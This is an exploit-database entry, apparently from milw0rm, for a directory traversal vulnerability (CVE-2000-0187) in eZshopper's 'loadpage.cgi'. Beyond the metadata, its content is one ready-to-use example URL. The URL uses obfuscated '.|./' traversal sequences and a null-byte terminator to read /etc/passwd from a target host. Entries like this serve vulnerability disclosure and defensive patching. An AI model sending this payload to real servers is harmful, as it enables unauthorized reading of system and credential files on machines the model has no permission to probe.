Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal



EKU-ID: 8820 CVE: OSVDB-56;CVE-2000-0187 OSVDB-ID:
Author: Zero X Published: 2004-11-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# milw0rm.com [2004-11-25]